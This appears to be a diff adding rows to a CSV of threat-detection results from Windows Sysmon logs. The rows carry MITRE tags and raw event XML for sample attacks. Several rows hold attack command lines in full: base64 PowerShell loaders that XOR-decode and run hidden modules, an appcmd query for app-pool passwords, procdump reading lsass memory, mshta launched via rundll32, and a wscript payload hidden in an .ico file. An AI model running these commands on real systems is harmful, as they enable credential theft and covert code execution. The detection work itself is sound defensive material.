+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-433C-5CE0-0000-00100FD20000
+ 964
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5904
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.851
+ 365ABB72-3D6D-5CEB-0000-0010C47BFF00
+ 560
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6192
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:54.612
+ 365ABB72-FE76-5CEB-0000-001015780C00
+ 1260
+ \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe
+ ?
+ ?
+ ?
+ ?
+ \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448
+ 365ABB72-FE6C-5CEB-0000-00104A170C00
+ 3680
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6192
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:54.612
+ 365ABB72-FE76-5CEB-0000-001015780C00
+ 1260
+ \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe
+ ?
+ ?
+ ?
+ ?
+ \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448
+ 365ABB72-FE6C-5CEB-0000-00104A170C00
+ 3680
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16498
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:01:50.852
+ 365ABB72-517E-5CD8-0000-00105FE01700
+ 2920
+ C:\Windows\System32\calc.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\calc.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1
+ 365ABB72-517E-5CD8-0000-001024D61700
+ 2952
+ C:\Windows\System32\pcalua.exe
+ "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16396
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.592
+ 365ABB72-21B8-5CD8-0000-0010E4E82600
+ 2964
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contain suspicious command ( \mshta.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16396
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.592
+ 365ABB72-21B8-5CD8-0000-0010E4E82600
+ 2964
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16396
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.592
+ 365ABB72-21B8-5CD8-0000-0010E4E82600
+ 2964
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 374
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 00:35:07.386
+ 365ABB72-47BB-5CE3-0000-001071AD3E00
+ 3944
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /c test.bat
+ C:\Users\IEUser\Downloads\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-47BB-5CE3-0000-0010BFA83E00
+ 1912
+ C:\Users\IEUser\Downloads\com-hijack.exe
+ "C:\Users\IEUser\Downloads\com-hijack.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966252
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:36:04.226
+ 365ABB72-52B4-5C91-0000-0010D55B0100
+ 1636
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-528D-5C91-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-528D-5C91-0000-001062560000
+ 484
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
+
+
+
+
+ 10
+ 3
+ 4
+ 10
+ 0
+ 0x8000000000000000
+
+
+ 4434
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 19:09:41.328
+ 365ABB72-9B75-5C8E-0000-0010013F1200
+ 1856
+ 980
+ C:\Users\IEUser\Desktop\procdump.exe
+ 365ABB72-0886-5C8F-0000-001030560000
+ 476
+ C:\Windows\system32\lsass.exe
+ 0x1fffff
+ C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10675
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-14 12:17:14.661
+ 747F3D96-FBCA-5D53-0000-001036784100
+ 2876
+ C:\Windows\System32\wscript.exe
+ 5.812.10240.16384
+ Microsoft ® Windows Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-F419-5D53-0000-002026910200
+ 0x29126
+ 1
+ Medium
+ SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C
+ 747F3D96-FBCA-5D53-0000-0010B8664100
+ 2476
+ C:\Windows\System32\rundll32.exe
+ "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5901
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.771
+ 365ABB72-3D6D-5CEB-0000-00100478FF00
+ 3444
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwA